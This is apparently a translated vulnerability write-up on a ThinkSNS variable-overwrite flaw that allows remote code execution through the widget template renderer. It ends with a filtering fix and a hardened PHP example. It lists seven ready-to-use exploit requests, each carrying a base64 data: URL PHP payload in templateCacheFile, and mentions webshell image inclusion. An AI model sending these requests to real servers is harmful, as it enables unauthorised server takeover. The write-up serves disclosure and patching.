ThinkSNS third play seven front-end GetShell

Source: Internet
Author: User


The vulnerability is in DenounceWidget.class.php:


\Addons\widget\DenouceWidget.class.php:23
 

    /**
     * Report pop-up box
     * @return string pop-up page HTML
     */
    public function index() {
        // get relevant data
        $var = $this->getVar();
        $content = $this->renderFile(dirname(__FILE__) . "/index.html", $var);
        return $content;
    }



As you can see, the index function obtains its parameters through $this->getVar() and then passes them to $this->renderFile(dirname(__FILE__) . "/index.html", $var) for template rendering and output.

First, look at $this->getVar():

\Addons\widget\DenouceWidget.class.php:56:
 

    /**
     * Format the template variables
     * @return array reported information
     */
    public function getVar() {
        if (empty($_GET['aid']) || empty($_GET['fuid']) || empty($_GET['type'])) {
            return false;
        }
        // every request parameter is copied into the template variable array
        foreach ($_GET as $k => $v) {
            $var[$k] = t($v);
        }
        $var['uid'] = $GLOBALS['ts']['mid'];
        empty($var['app']) && $var['app'] = 'public';
        $var['source'] = model('source')->getSourceInfo($var['type'], $var['aid'], false, $var['app']);
        return $var;
    }



The foreach loop merges the whole of $_GET into $var, and the merged array is returned.

Next, follow $this->renderFile(dirname(__FILE__) . "/index.html", $var):

\Core\OpenSociax\Widget.class.php:73
 

    /**
     * Render template output, for internal render method calls
     * @access public
     * @param string $templateFile template file
     * @param mixed $var template variables
     * @param string $charset template encoding
     * @return string
     */
    protected function renderFile($templateFile = '', $var = '', $charset = 'utf-8') {
        $var['ts'] = $GLOBALS['ts'];
        if (!file_exists_case($templateFile)) {
            // automatically locate the template file
            // $name = substr(get_class($this), 0, -6);
            // $filename = empty($templateFile) ? $name : $templateFile;
            // $templateFile = 'widget/' . $name . '/' . $filename . C('TMPL_TEMPLATE_SUFFIX');
            // if (!file_exists_case($templateFile)) throw_exception(L('_WIDGET_TEMPLATE_NOT_EXIST_') . '[' . $templateFile . ']');
        }
        $template = $this->template ? $this->template : strtolower(C('TMPL_ENGINE_TYPE') ? C('TMPL_ENGINE_TYPE') : 'php');
        // the request-derived $var array goes straight into the template engine
        $content = fetch($templateFile, $var, $charset);
        return $content;
    }



The variables taken from the $_GET array are passed directly into fetch() for execution. fetch() has a variable-overwrite vulnerability, so a shell can be obtained.

For details of the fetch vulnerability, see WooYun: ThinkPHP Remote Code Execution (specific conditions must be met).
 

Two getshell methods: include an image containing a webshell, or use a stream wrapper (as in the data: URL below).
 

/index.php?app=widget&mod=Denouce&act=index&aid=1&fuid=1&type=ztz&templateCacheFile=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4%3D


Six other entry points work on the same principle:

1. POST /index.php?app=widget&mod=Comment&act=addcomment&uid=1

   app_name=public&table_name=user&content=test&row_id=1&app_detail_summary=1&templateCacheFile=data:text/plain;base64,signature%3D

2. POST /index.php?app=widget&mod=Department&act=change

   templateCacheFile=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4%3D

3. POST /index.php?app=widget&mod=Diy&act=addWidget

   templateCacheFile=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4%3D

4. POST /index.php?app=widget&mod=FeedList&act=loadMore

   templateCacheFile=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4%3D

5. POST /index.php?app=widget&mod=FeedList&act=loadNew

   templateCacheFile=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4%3D&maxId=1

6. POST /index.php?app=widget&mod=Remark&act=edit

   templateCacheFile=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4%3D

Solution:

Enhanced Filtering
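The following is an added example, not ThinkSNS or ThinkPHP code. It models the root cause described above (every $_GET key merged into the template variable array and then handed to fetch(), where engine-internal variables such as $templateCacheFile can be overwritten) and makes "enhanced filtering" concrete on both sides: an allowlist in getVar() and a defensive extract in the renderer. It assumes fetch() extracts the variable array into its own scope before choosing the cache file; the page only states that fetch has a variable-overwrite problem and does not show its code.

```php
<?php
// Added example, not ThinkSNS/ThinkPHP code. Models the bug class on this
// page: request parameters merged wholesale into the template variable array
// can overwrite engine-internal variables such as $templateCacheFile.
// Assumption: fetch() extracts the variable array into its own scope before
// choosing the cache file (the real fetch() is not shown on the page).

// Stand-in for fetch(): returns the cache path it would go on to include.
function fetchCachePathVulnerable(string $templateFile, array $var): string
{
    $templateCacheFile = '/var/cache/' . md5($templateFile) . '.php'; // intended
    extract($var, EXTR_OVERWRITE);  // request-controlled keys clobber locals
    return $templateCacheFile;
}

// Engine-side fix: drop reserved keys and never overwrite existing locals.
function fetchCachePathHardened(string $templateFile, array $var): string
{
    $templateCacheFile = '/var/cache/' . md5($templateFile) . '.php';
    unset($var['templateCacheFile'], $var['templateFile'], $var['charset']);
    extract($var, EXTR_SKIP);       // EXTR_SKIP leaves $templateCacheFile intact
    return $templateCacheFile;
}

// Widget-side bug: getVar() copies every request key, as on this page.
function getVarVulnerable(array $get): array
{
    $var = [];
    foreach ($get as $k => $v) { $var[$k] = $v; }
    return $var;
}

// Widget-side fix ("enhanced filtering"): allowlist the keys the widget needs.
function getVarHardened(array $get): array
{
    $var = [];
    foreach (['aid', 'fuid', 'type', 'app'] as $k) {
        if (isset($get[$k])) { $var[$k] = (string) $get[$k]; }
    }
    $var['app'] = $var['app'] ?? 'public';
    return $var;
}

// Constructed request: the expected parameters plus an injected control key.
$get = ['aid' => '1', 'fuid' => '1', 'type' => 'ztz',
        'templateCacheFile' => 'ATTACKER_CONTROLLED_PATH'];
echo fetchCachePathVulnerable('index.html', getVarVulnerable($get)), "\n";
echo fetchCachePathVulnerable('index.html', getVarHardened($get)), "\n";
echo fetchCachePathHardened('index.html', getVarVulnerable($get)), "\n";
```

Only the first line echoes the injected value; either fix on its own is enough to keep the intended cache path, and applying both removes the dependency on the template engine's extract behaviour.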
